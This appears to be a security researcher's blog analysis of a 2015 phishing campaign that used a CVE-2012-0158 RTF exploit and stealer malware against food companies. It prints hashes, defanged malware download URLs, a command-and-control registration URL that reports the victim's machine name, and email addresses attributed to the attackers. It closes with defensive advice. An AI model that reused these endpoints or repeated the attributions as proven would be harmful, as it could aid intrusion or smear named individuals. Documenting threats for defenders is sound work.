The great Olive Oil hack

On Tuesday 24th February 2015, an employee at a food company who handles olive oil received an email about olive oil:

The email was sent from Microsoft Hotmail, neski.tarlon-neski@hotmail.com. It contains references to Tarlon Neski, and Foodiegroup.net (a food company). Because the email was sent via Microsoft’s cloud infrastructure, it is likely to bypass spam filtering.

It’s actually part of an attempt to break into the networks of food manufacturing groups.

The attachment, scan3.zip, contained a Word document called scan3.doc. Unzipped, this clocks in at 6.62mb in space. The Virustotal report is here (note that detection rates have dramatically improved after distributing the document).

The Word document was actually an RTF document, containing exploit CVE-2012–0158. The exploit is, obviously, many years old — but many companies simply do not patch, or have resources to patch.

The document causes Word 2010 to crash:

At which point, the payload is silently delivered. From this point, no problem is visible to users.

The attackers appear to inspect the PC, then deliver three executables:

alitalia.exe —VirusTotal: 07c87ae27e3ff293a33b77d5c4130813074c17362e3ae7561f572ed79dc08ab1

ggrhrhrh.exe — VirusTotal:
3ad42d527ed36160a80d57c9619b3b0f55fd20cc23c08637f732846cd8aa0c20

slut.exe — VirusTotal:
b3ac56ebf9a8ccb240208e2f5d8ea903aedd6e001845432fc980a04da8e42bda

When these were submitted to Virustotal, no vendor detected them. I have since distributed these to antivirus providers.

These executables are renamed, and various other malicious actions take place.

It appears to be a combination of Betabot/Neurevt, ISR Stealer and assorted extras.

Downloads are made via:

hxxp://198.50.199.227/hatenot/Panel/order.php?id=5055507
hxxp://artphotolab.ru/wp-content/plugins/documents/upload/adobe/ (IP address 178.170.164.215)

A posting is made to register the PC in an infection asset management system Command and Control:

hxxp://hjfgfhejdhfg.netau.net/a/index.php?action=add&username=&password=&app=&pcname=<MACHINE_NAME>&sitename= (IP address 31.170.160.129)

This database is big: they are targeting food companies, in particular the malicious actor(s) have a very large list employees who work with olive oil. This list may have been obtained from documents on the International Olive Oil Council website, along with others, based on typos in the public addresses.

One of the executables contains an email address, this email address is vladirputs@mail.com and is used to deliver keylogs, RDP session details, and screenshots.

By further research we were able to find an actor in the attack — maylukin001@gmail.com

It is unknown why they are targeting food production companies.

One thing to be very careful of — it is clear from the C&C server that a significant number of food companies were impacted — some small, some very large — and those end user machines generally had antivirus software and were sitting behind the corporate firewall. I strongly recommend food companies beef up their security, outside of installing legacy endpoint antivirus solutions — by having your internal PCs available to external malicious actors, your firewall is useless and your security is compromised.

To give an example, they have stored various screenshots of PCs they were busy hacking in the attack infrastructure:

The malicious actors in this attack appear to be silently hacking the systems and placing them into the asset database. What they plan to do with them is unknown, but by keylogging access to internal systems they may aim to move further inside the networks of those impacted.

Recommended preventative actions

• Place RTF files in Protected View in Office, using Group Policy.
• Turn on ActiveX control filtering in Office, using Group Policy (or just disable ActiveX in Office)
• Trustwave Secure Email Gateway correctly flags this attachment as an exploit attempt, and fails to deliver it to the user. Find an email filtering solution which extracts ZIP files and inspects Office documents, to make sure they are a valid Office format.
• Place users behind a proxy or firewall which can control downloads, and then do not allow random employees to download executables. Whitelist executable download sites instead. 99% of your employees don't need to download a file called slut.exe from a Russian website, yet most corporations still allow this. Pro-tip: don’t. If users kick off they can’t install iTunes to listen to Justin Bieber, tell them to do some work instead. They might just benefit your company instead.
• Microsoft EMET (free) stops the exploit, as does Palo-Alto TRAPS and Malwarebytes Anti-Exploit — even if you have failed to security patch. If you do not have time to do regular security updates, you could reinvest some time in deploying an anti-exploit system. These also provide good coverage of security exploits where no patch exists.
• Consider using Microsoft AppLocker — included in Enterprise and Ultimate editions of Windows — to restrict executables running from the AppData folder. Slut.exe does not need to run from your user temp folders. This stops most forms of malware dead.
• Palo-Alto TRAPS had generic detection of the exploit payload method since February 5th — 17 days before food companies were targeted. However, it is not free (or particularly cheap).